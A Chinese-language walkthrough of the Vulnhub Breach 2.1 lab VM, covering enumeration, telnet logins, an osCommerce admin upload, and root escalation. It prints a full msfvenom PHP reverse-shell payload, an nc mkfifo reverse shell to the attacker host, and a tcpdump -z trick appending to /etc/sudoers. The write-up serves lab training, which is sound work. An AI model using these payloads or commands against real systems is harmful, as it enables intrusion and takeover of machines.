  • 为了加载用户配置,bash 在每次启动时都会加载 .bashrc 文件的内容。

  • 每个用户的 home 目录都有这个 shell 脚本。

  • 它用来存储并加载用户的终端配置和环境变量。

再次使用SSH连接peter用户成功

ssh [email protected] -p65535

  • 密码:inthesource

┌──(root㉿kali)-[~]
└─# ssh [email protected] -p65535
#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded                #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   #
#############################################################################
[email protected]'s password: 
$ whoami
peter

六、提权

信息收集

sudo -l

history # 查看历史记录

uname -a # 查看内核版本

ps -anx |grep root # 查看进程

ps -ef

crontab -l # 计划任务

ls -la # 查看隐藏文件及权限

find / -perm -u=s -type f 2>/dev/null # 查看suid

find / -perm -g=s -type f 2>/dev/null # 查看guid

netstat -tunlpa # 查看端口开放状态

cat /etc/passwd

除了peter还有两个用户milton和blumbergh

$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:109::/var/run/dbus:/bin/false
avahi:x:105:110:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
Debian-exim:x:106:112::/var/spool/exim4:/bin/false
statd:x:107:65534::/var/lib/nfs:/bin/false
colord:x:108:116:colord colour management daemon,,,:/var/lib/colord:/bin/false
geoclue:x:110:117::/var/lib/geoclue:/bin/false
rtkit:x:113:121:RealtimeKit,,,:/proc:/bin/false
saned:x:114:122::/var/lib/saned:/bin/false
usbmux:x:115:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
Debian-gdm:x:116:123:Gnome Display Manager:/var/lib/gdm3:/bin/false
peter:x:1000:1000:peter,,,:/home/peter:/bin/bash
sshd:x:109:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:112:125:MySQL Server,,,:/nonexistent:/bin/false
blumbergh:x:1001:1001::/home/blumbergh:/bin/false
milton:x:1002:1002::/home/milton:/bin/bash
telnetd:x:117:126::/nonexistent:/bin/false
dnsmasq:x:118:65534:dnsmasq,,,:/var/lib/misc:/bin/false

有个陌生的2323端口正处于监听状态

$ netstat -tunlpa
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:41978           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:65535           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:2323          0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.110.151:41299   192.168.110.128:5868    ESTABLISHED 2068/Ujaax      
tcp        0      0 192.168.110.151:44311   192.168.110.128:3000    TIME_WAIT   -               
tcp        0      0 192.168.110.151:58219   192.168.110.128:8080    ESTABLISHED 2068/Ujaax      
tcp        0      0 192.168.110.151:52900   192.168.110.128:8989    ESTABLISHED 6389/nc         
tcp        0      0 192.168.110.151:58220   192.168.110.128:8080    ESTABLISHED 2068/Ujaax      
tcp        0      0 192.168.110.151:65535   192.168.110.128:59798   ESTABLISHED -               
tcp        0      0 192.168.110.151:52086   192.168.110.128:4433    ESTABLISHED 2068/Ujaax      
tcp6       0      0 :::53272                :::*                    LISTEN      -               
tcp6       0      0 :::111                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
udp        0      0 0.0.0.0:39841           0.0.0.0:*                           -               
udp        0      0 192.168.110.151:53925   192.168.72.2:53         ESTABLISHED -               
udp        0      0 192.168.110.151:49875   192.168.72.2:53         ESTABLISHED 2068/Ujaax      
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -               
udp        0      0 0.0.0.0:1006            0.0.0.0:*                           -               
udp        0      0 127.0.0.1:1016          0.0.0.0:*                           -               
udp        0      0 0.0.0.0:44036           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
udp6       0      0 :::5353                 :::*                                -               
udp6       0      0 :::1006                 :::*                                -               
udp6       0      0 :::57919                :::*                                -               
udp6       0      0 :::36695                :::*                                -               
udp6       0      0 :::111                  :::*                                -              

使用telnet连接

telnet 127.0.0.1 2323

$ telnet 127.0.0.1 2323
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
29 45'46" N 95 22'59" W

是一个坐标,搜索发现这个坐标刚好是休斯顿(houston)的坐标,以刚刚得到的用户名milton、blumbergh进行登录

Houston is the southeast anchor of the greater megaregion known as the Texas Triangle with coordinates 29° 45′ 46″ N, 95° 22′ 59″ W (29.762778, -95.383056).

获取到登录口令再次使用telnet连接

telnet 127.0.0.1 2323

  • 用户名:milton

  • 密码:Houston

$ telnet 127.0.0.1 2323
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
29 45'46" N 95 22'59" W 
breach2 login: milton
Password: 
Last login: Wed Jul 20 21:04:18 EDT 2016 from localhost on pts/0
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64
29 45'46" N 95 22'59" W 
3
2
1
Whose stapler is it?

登录成功但有几句提示被弹了出来,提示Whose stapler is it?这句话不可能凭空重新,肯定是某个程序执行产生的。

使用 grep 全局搜索看看是哪个文件打印出来的

grep -r "Whose stapler is it?" / 2>/dev/null

  • -r # 指定关键字

  • / # 所有目录

  • 2>/dev/null # 过滤错误信息

$ grep -r "Whose stapler is it?" / 2>/dev/null
/usr/local/bin/cd.py:   question = raw_input("Whose stapler is it?")
Binary file /proc/6839/task/6839/cmdline matches
Binary file /proc/6839/cmdline matches
Binary file /proc/6840/task/6840/cmdline matches
Binary file /proc/6840/cmdline matches

查看/usr/local/bin/cd.py文件源码

cat /usr/local/bin/cd.py

$ cat /usr/local/bin/cd.py
#!/usr/bin/python

import signal
import time
import os

s = signal.signal(signal.SIGINT, signal.SIG_IGN)

countdown=3

while countdown >0:
        time.sleep(1)
        print(countdown)
        countdown -=1
if countdown <1:
        question = raw_input("Whose stapler is it?")
if question == "mine":
        os.system("echo 'Woot!'")
else:

        os.system("kill -9 %d"%(os.getppid()))
        signal.signal(signal.SIGINT, s)
you have mail

分析源码,问题答案是mine,如果在三秒内没有回答正确,就会杀死进程,那么再尝试登录并在3秒内输入mine,成功登录

telnet 127.0.0.1 2323

  • 用户名:milton

  • 密码:Houston

  • 口令:mine

milton@breach2:~$ telnet 127.0.0.1 2323
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
29 45'46" N 95 22'59" W 
breach2 login: milton
Password: 
Last login: Wed May 10 04:18:01 EDT 2023 from localhost on pts/4
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64
29 45'46" N 95 22'59" W 
mine
3
2
1
Whose stapler is it?Woot!
milton@breach2:~$ whoami
milton

继续收集信息,没有找到提权的方法,不过又找出来一个陌生的8888端口处于监听状态

netstat -tunlpa

milton@breach2:~$ netstat -tunlpa
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:8888            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:41978           0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:65535           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:2323          0.0.0.0:*               LISTEN      -               
tcp        0      0 192.168.110.151:41299   192.168.110.128:5868    ESTABLISHED -               
tcp        0      0 127.0.0.1:40897         127.0.0.1:2323          ESTABLISHED 6960/telnet     
tcp        0      0 192.168.110.151:58219   192.168.110.128:8080    ESTABLISHED -               
tcp        0      0 127.0.0.1:2323          127.0.0.1:40897         ESTABLISHED -               
tcp        0      0 192.168.110.151:58220   192.168.110.128:8080    ESTABLISHED -               
tcp        0     36 192.168.110.151:65535   192.168.110.128:59798   ESTABLISHED -               
tcp        0      0 127.0.0.1:2323          127.0.0.1:40896         ESTABLISHED -               
tcp        0      0 127.0.0.1:40896         127.0.0.1:2323          ESTABLISHED -               
tcp        0      0 192.168.110.151:52086   192.168.110.128:4433    ESTABLISHED -               
tcp6       0      0 :::8888                 :::*                    LISTEN      -               
tcp6       0      0 :::53272                :::*                    LISTEN      -               
tcp6       0      0 :::111                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
udp        0      0 0.0.0.0:39841           0.0.0.0:*                           -               
udp        0      0 192.168.110.151:49875   192.168.72.2:53         ESTABLISHED -               
udp        0      0 0.0.0.0:5353            0.0.0.0:*                           -               
udp        0      0 0.0.0.0:1006            0.0.0.0:*                           -               
udp        0      0 127.0.0.1:1016          0.0.0.0:*                           -               
udp        0      0 0.0.0.0:44036           0.0.0.0:*                           -               
udp        0      0 0.0.0.0:111             0.0.0.0:*                           -               
udp6       0      0 :::5353                 :::*                                -               
udp6       0      0 :::1006                 :::*                                -               
udp6       0      0 :::57919                :::*                                -               
udp6       0      0 :::36695                :::*                                -               
udp6       0      0 :::111                  :::*                                -              

用telnet再搞一下,提示输入^]字符逃出

telnet 127.0.0.1 8888

milton@breach2:~$ telnet 127.0.0.1 8888
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
^]
HTTP/1.1 400 Bad Request
Server: nginx/1.6.2
Date: Wed, 10 May 2023 08:24:53 GMT
Content-Type: text/html
Content-Length: 172
Connection: close

<html>
<head><title>400 Bad Request</title></head>
<body bgcolor="white">
<center><h1>400 Bad Request</h1></center>
<hr><center>nginx/1.6.2</center>
</body>
</html>
Connection closed by foreign host.

看着像是http服务,用nmap再扫下端口,又多了个服务

nmap -A -p- 192.168.110.151

┌──(root㉿kali)-[~]
└─# nmap -A -p- 192.168.110.151
Starting Nmap 7.93 ( https://nmap.org ) at 2023-05-12 08:25 CST
Nmap scan report for 192.168.110.151
Host is up (0.00085s latency).
Not shown: 65530 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
|_http-title: Initech Cyber Consulting, LLC
|_http-server-header: Apache/2.4.10 (Debian)
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          36695/udp6  status
|   100024  1          41978/tcp   status
|   100024  1          44036/udp   status
|_  100024  1          53272/tcp6  status
8888/tcp  open  http    nginx 1.6.2
|_http-title: Index of /
| http-ls: Volume /
| SIZE  TIME               FILENAME
| -     15-Jun-2016 20:50  oscommerce/
| 867   15-Jun-2016 18:09  index.nginx-debian.html
|_
|_http-server-header: nginx/1.6.2
41978/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
| ssh-hostkey: 
|   1024 f3539a0b4076b102873ea57aae859d26 (DSA)
|   2048 9aa8db784b444ffbe5836b67e3acfbf5 (RSA)
|   256 c163f1dc8f24818235fa881ab8734024 (ECDSA)
|_  256 3b4d56375ec3457515cd85004f8ba85e (ED25519)
MAC Address: 00:0C:29:6D:6F:E1 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.85 ms 192.168.110.151

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 32.87 seconds

有个oscommerce目录,前面的SQL注入就在这个库里面爆了个用户名密码

http://192.168.110.151:8888/oscommerce/

  • 用户名:admin

  • 密码:admin

有登录口令肯定扫后台登录

dirb http://192.168.110.151:8888/oscommerce/

┌──(root㉿kali)-[~]
└─# dirb http://192.168.110.151:8888/oscommerce/

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Fri May 12 08:36:12 2023
URL_BASE: http://192.168.110.151:8888/oscommerce/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://192.168.110.151:8888/oscommerce/ ----
+ http://192.168.110.151:8888/oscommerce/.htaccess (CODE:200|SIZE:829)
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/admin/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/download/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/ext/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/images/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/includes/
+ http://192.168.110.151:8888/oscommerce/index.php (CODE:200|SIZE:9022)
+ http://192.168.110.151:8888/oscommerce/info.php (CODE:200|SIZE:8064)
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/pub/
==> DIRECTORY: http://192.168.110.151:8888/oscommerce/templates/

使用口令登录后台

http://192.168.110.151:8888/oscommerce/admin/

  • 用户名:admin

  • 密码:admin

成功登录后台,找上传点上传木马

有个文件管理器

includes目录下有个可写目录work

使用msf生成php木马,直接复制生成的木马源码

msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=6869 -f raw -o shell.php

┌──(root㉿kali)-[~]
└─# msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.110.128 LPORT=6869 -f raw -o shell.php
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
No encoder specified, outputting raw payload
Payload size: 1116 bytes
Saved as: shell.php

┌──(root㉿kali)-[~]
└─# cat shell.php
/*<?php /**/ error_reporting(0); $ip = '192.168.110.128'; $port = 6869; if (($f = 'stream_socket_client') && is_callable($f)) { $s = $f("tcp://{$ip}:{$port}"); $s_type = 'stream'; } if (!$s && ($f = 'fsockopen') && is_callable($f)) { $s = $f($ip, $port); $s_type = 'stream'; } if (!$s && ($f = 'socket_create') && is_callable($f)) { $s = $f(AF_INET, SOCK_STREAM, SOL_TCP); $res = @socket_connect($s, $ip, $port); if (!$res) { die(); } $s_type = 'socket'; } if (!$s_type) { die('no socket funcs'); } if (!$s) { die('no socket'); } switch ($s_type) { case 'stream': $len = fread($s, 4); break; case 'socket': $len = socket_read($s, 4); break; } if (!$len) { die(); } $a = unpack("Nlen", $len); $len = $a['len']; $b = ''; while (strlen($b) < $len) { switch ($s_type) { case 'stream': $b .= fread($s, $len-strlen($b)); break; case 'socket': $b .= socket_read($s, $len-strlen($b)); break; } } $GLOBALS['msgsock'] = $s; $GLOBALS['msgsock_type'] = $s_type; if (extension_loaded('suhosin') && ini_get('suhosin.executor.disable_eval')) { $suhosin_bypass=create_function('', $b); $suhosin_bypass(); } else { eval($b); } die();

在work目录下新建文件shell.php,将木马源码粘贴进去保存

Kali使用msf的exploit模块开启监听

msfconsole

use exploit/multi/handler

set payload php/meterpreter/reverse_tcp

set LHOST 192.168.110.128

set LPORT 6869

options

run

┌──(root㉿kali)-[~]
└─# msfconsole
                                                  
                                   ___          ____
                               ,-""   `.      < HONK >
                             ,'  _   e )`-._ /  ----
                            /  ,' `-._<.===-'
                           /  /
                          /  ;
              _          /   ;
 (`._    _.-"" ""--..__,'    |
 <_  `-""                     \
  <`-                          :
   (__   <__.                  ;
     `-.   '-.__.      _.'    /
        \      `-.__,-'    _,'
         `._    ,    /__,-'
            ""._\__,'< <____
                 | |  `----.`.
                 | |        \ `.
                 ; |___      \-``
                 \   --<
                  `.`.<
                    `-'



       =[ metasploit v6.2.36-dev                          ]
+ -- --=[ 2277 exploits - 1191 auxiliary - 408 post       ]
+ -- --=[ 951 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Tired of setting RHOSTS for modules? Try 
globally setting it with setg RHOSTS x.x.x.x
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use exploit/multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.110.128
LHOST => 192.168.110.128
msf6 exploit(multi/handler) > set LPORT 6869
LPORT => 6869
msf6 exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.110.128  yes       The listen address (an interface may be specified)
   LPORT  6869             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target



View the full module info with the info, or info -d command.

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.110.128:6869

浏览器访问木马文件,成功反弹blumbergh用户权限

http://192.168.110.151:8888/oscommerce/includes/work/shell.php

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.110.128:6869 
[*] Sending stage (39927 bytes) to 192.168.110.151
[*] Meterpreter session 1 opened (192.168.110.128:6869 -> 192.168.110.151:36386) at 2023-05-12 09:09:33 +0800

meterpreter > getuid
Server username: blumbergh

优化SHELL

python -c 'import pty; pty.spawn("/bin/bash")'

meterpreter > shell
Process 7772 created.
Channel 0 created.
python -c 'import pty; pty.spawn("/bin/bash")'
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$

反弹SHELL终端到Kali上,Kali提前开启监听

nc -lvnp 8989

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...

msf获取的shell环境执行nc反弹

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.110.128 8989 >/tmp/f

Kali端成功监听

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989
listening on [any] 8989 ...
connect to [192.168.110.128] from (UNKNOWN) [192.168.110.151] 53852
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh),1004(fin)

升级FULL TTY

python -c 'import pty; pty.spawn("/bin/bash")'

CTRL+Z

stty raw -echo

fg

ls

export SHELL=/bin/bash

export TERM=screen

stty rows 32 columns 145

reset

┌──(root㉿kali)-[~]
└─# nc -lvnp 8989                                                                                                                                
listening on [any] 8989 ...
connect to [192.168.110.128] from (UNKNOWN) [192.168.110.151] 53852
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=1001(blumbergh) gid=1001(blumbergh) groups=1001(blumbergh),1004(fin)
$ python -c 'import pty; pty.spawn("/bin/bash")'
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ ^Z
[1]+  已停止               nc -lvnp 8989

┌──(root㉿kali)-[~]
└─# stty raw -echo                                                                                                                               

┌──(root㉿kali)-[~]
└─#                                                                                                                                              
nc -lvnp 8989
             ls
also_purchased-1.cache
backpipe
box-reviews-1-en_US.cache
box-reviews-en_US.cache
box-whats_new-en_US-USD.cache
box_best_sellers-0-en_US.cache
box_best_sellers-2-en_US.cache
category_tree-en_US.cache
configuration.cache
currencies.cache
images_groups-1.cache
languages-en_US-account.cache
languages-en_US-general.cache
languages-en_US-index.cache
languages-en_US-info.cache
languages-en_US-modules-boxes.cache
languages-en_US-modules-content.cache
languages-en_US-products.cache
languages.cache
manufacturers.cache
new_products-en_US-USD-0.cache
oscommerce_errors.log
shell.php
templates.cache
templates_boxes_layout-default-account-login.php.cache
templates_boxes_layout-default-index-index.php.cache
templates_boxes_layout-default-index-product_listing.php.cache
templates_boxes_layout-default-info-info.php.cache
templates_boxes_layout-default-products-info.php.cache
templates_content_layout-default-account-login.php.cache
templates_content_layout-default-index-index.php.cache
templates_content_layout-default-index-product_listing.php.cache
templates_content_layout-default-info-info.php.cache
templates_content_layout-default-products-info.php.cache
upcoming_products-en_US-USD.cache
weight-classes.cache
weight-rules.cache
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ stty raw -echo
blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ blumbergh@breach2:/var/www/blumbergh@breach2:/var/www/html2/oscommerce/includes/work$

sudo -l发现可用sudo提权的tcpdump程序

sudo -l

blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ sudo -l                                       
Matching Defaults entries for blumbergh on breach2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on breach2:
    (root) NOPASSWD: /usr/sbin/tcpdump

参考:

查看tcpdump帮助

sudo /usr/sbin/tcpdump -h

blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ sudo /usr/sbin/tcpdump -h
tcpdump version 4.6.2
libpcap version 1.6.2
OpenSSL 1.0.1t  3 May 2016
Usage: tcpdump [-aAbdDefhHIJKlLnNOpqRStuUvxX#] [ -B size ] [ -c count ]
                [ -C file_size ] [ -E algo:secret ] [ -F file ] [ -G seconds ]
                [ -i interface ] [ -j tstamptype ] [ -M secret ] [ --number ]
                [ -Q in|out|inout ]
                [ -r file ] [ -s snaplen ] [ --time-stamp-precision precision ]
                [ -T type ] [ --version ] [ -V file ]
                [ -w file ] [ -W filecount ] [ -y datalinktype ] [ -z command ]
                [ -Z user ] [ expression ]

将blumbergh提升到root并且无密码登录

echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/shell.sh && chmod +x /tmp/shell.sh && sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root && sudo -i

blumbergh@breach2:/var/www/html2/oscommerce/includes/work$ echo 'echo "blumbergh ALL=(ALL) NOPASSWD:ALL" >> /etc/sudoers' > /tmp/shell.sh && chmod +x /tmp/shell.sh && sudo /usr/sbin/tcpdump -ln -i eth0 -w /dev/null  -W 1 -G 1 -z /tmp/shell.sh -Z root && sudo -i
dropped privs to root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
root@breach2:~# id
uid=0(root) gid=0(root) groups=0(root)
root@breach2:~# whoami
root
root@breach2:~#

七、获取flag

cd /root/

python .flag.py

root@breach2:~# cd /root/
root@breach2:~# ls -al
total 60
drwx------  7 root root 4096 Jul 20  2016 .
drwxr-xr-x 22 root root 4096 Jun 20  2016 ..
-rw-------  1 root root    0 Jun 18  2016 .Xauthority
drwx------  2 root root 4096 Jun 21  2016 .aptitude
-rw-------  1 root root   61 May 10 06:59 .bash_history
-rw-r--r--  1 root root  570 Jan 31  2010 .bashrc
drwxr-xr-x  2 root root 4096 Jun 19  2016 .cache
drwx------  3 root root 4096 Jun 19  2016 .config
-rw-r--r--  1 root root 5074 Jun 22  2016 .flag.py
drwx------  4 root root 4096 Jun 19  2016 .mozilla
-rw-------  1 root root  958 Jun 21  2016 .mysql_history
-rw-------  1 root root   44 Jul 20  2016 .nano_history
-rw-r--r--  1 root root  140 Nov 19  2007 .profile
-rw-r--r--  1 root root   66 Jun 16  2016 .selected_editor
drwx------  2 root root 4096 Jun 19  2016 .ssh
root@breach2:~# python .flag.py


#========================================================================================#
# ___                                               ___                                  #
#(   )                                             (   )                                 #
# | |.-.    ___ .-.      .--.     .---.    .--.     | | .-.       .--.             .-.   #
# | /   \  (   )   \    /    \   / .-, \  /    \    | |/   \     ;  _  \         /    \  #
# |  .-. |  | ' .-. ;  |  .-. ; (__) ; | |  .-. ;   |  .-. .    (___)` |        |  .-. ; #
# | |  | |  |  / (___) |  | | |   .'`  | |  |(___)  | |  | |         ' '        | |  | | #
# | |  | |  | |        |  |/  |  / .'| | |  |       | |  | |        / /         | |  | | #
# | |  | |  | |        |  ' _.' | /  | | |  | ___   | |  | |       / /          | |  | | #
# | '  | |  | |        |  .'.-. ; |  ; | |  '(   )  | |  | |      / /      .-.  | '  | | #
# ' `-' ;   | |        '  `-' / ' `-'  | '  `-' |   | |  | |     / '____  (   ) '  `-' / #
#  `.__.   (___)        `.__.'  `.__.'_.  `.__,'   (___)(___)   (_______)  `-'   `.__,'  # 
#                                                                                        #
#========================================================================================#


Congratulations on reaching the end. I have learned a ton putting together these challenges and I hope you enjoyed it and perhaps learned something new. Stay tuned for the final in the series, Breach 3.0

Shout-out to sizzop, knightmare and rastamouse for testing and g0tmi1k for hosting and maintaining #vulnhub.

-mrb3n




root@breach2:~#

八、总结

权限大的用户不一定可以提升到更高权限 ,权限小的却有可能直接提权到ROOT

标签:110.151,0.0,192.168,exploit,Vulnhub,Breach,2.1,peter,root
From: https://www.cnblogs.com/HKalpa/p/17393494.html

相关文章

  • mysql:安装phpmyadmin(phpMyAdmin 5.2.1 / PHP 8.2.5 / mysqld 8.0.33)
    一,下载phpmyadmin:官网:https://www.phpmyadmin.net/如图: 注意不同版本的环境需求可以得到下载地址后直接在linux上wget[root@imgphpmyadmin]#wgethttps://files.phpmyadmin.net/phpMyAdmin/5.2.1/phpMyAdmin-5.2.1-all-languages.zip解压:[root@imgphpmyadm......
  • 2.11换硬币
    1.问题描述将5元的人民币兑换成1元、5角和1角的硬币,共有多少种不同的兑换方法。2.代码#include<stdio.h> #define N 100 int main(){   int i,j,k;            //i表示1分硬币个数,j表示2分硬币个数,k表示5分硬币个数    int count = 0;  ......
  • ICA:1~vulnhub
    靶场环境:kali攻击机:10.21.29.198靶机:10.21.29.227信息收集首先进行端口扫描:发现22803306端口登录80端口发现是一登录页面首先可以看到CMS:qdPM9.2攻击过程kali进行漏洞库搜索:searchsploitqdPM9.2查看漏洞详情:```cat/usr/share/exploitdb/exploits/php/weba......
  • 2.10马克思手稿中的纯数学题
    1.问题描述马克思手稿中有一道趣味数学问题:有30个人,其中有男人、女人和小孩,他们在同一家饭馆吃饭,总共花了50先令。已知每个男人吃饭需要花3先令,每个女人吃饭需要花2先令,每个小孩吃饭需要花1先令,请编程求出男人、女人和小孩各有几人。2.#include<stdio.h>intmain(){ intx,y,z; ......
  • 2.1 程序的机器级表示
    本章将详细学习汇编语言,了解如何将c程序编译成这种形式的机器代码。数据格式各种数据类型大小如下操作数指示符大多数指令有一个或多个操作数,指示出执行一个操作中要使用的源数据值,以及放置结果的目的位置。各种操作数的可能性被分为三种,第一种是立即数,用来表示常数值,不同指......
  • 2.1 电路的等效替换 平衡电桥 Y形与△形电阻等效替换
    2.1电路的等效替换平衡电桥Y形与△形电阻等效替换一、电路的等效变换1.一端口任何一个复杂的电路,向外引出两个端钮,且从一个端子流入的电流等于从另一个端子流出的电流,则称这一电路为二端网络2.等效电路两个二端电路,端口具有相同的电压、电流关系,则称他们是等效的电路两个......
  • 2.11换分币
    1.问题描述:将五元人民币兑换成1元,5角和1角的硬币,共有多少种的不同兑换方式。2.源代码:#include<iostream>usingnamespacestd;intmain(){ for(inti=0;i<=5;i++) { for(intj=0;j<=(50-i*10)%5;j++) { intk=50-i*10-j*5; cout<<"一元:"......
  • vulnhub --> Web Machine: (N7)
    靶场下载地址WebMachine:(N7) <<点我开始打靶ip发现:nmap扫描网段发现靶机ip:192.168.56.101端口发现:对靶机进行常规端口扫描访问网站:目录扫描发现一个叫exploit.html的页面,访问页面发现是一个上传页面随便上传一个文件,点击提交查询,发现跳转到localhost域名CSRF......
  • (hdu step 3.2.1)Max Sum(简单dp:求最大子序列和、起点、终点)
    题目:MaxSumTimeLimit:2000/1000MS(Java/Others)MemoryLimit:65536/32768K(Java/Others)TotalSubmission(s):1390AcceptedSubmission(s):542 ProblemDescriptionGivenasequencea[1],a[2],a[3]......a[n],yourjobistocalculatethemaxsu......
  • Vulnhub-dpwwn01-WP
    前言点击>>下载靶机靶机kalilinux:ip地址为192.168.20.200靶机探测使用nmap探测靶机nmap192.168.20.0/24靶机ip为192.168.20.131使用nmap进行详细扫描nmap-A-p-192.168.20.131点击查看扫描结果rootin/home/kalivia☕v17.0.6…➜nmap-A-p-192.168.2......

赞助商

阅读排行

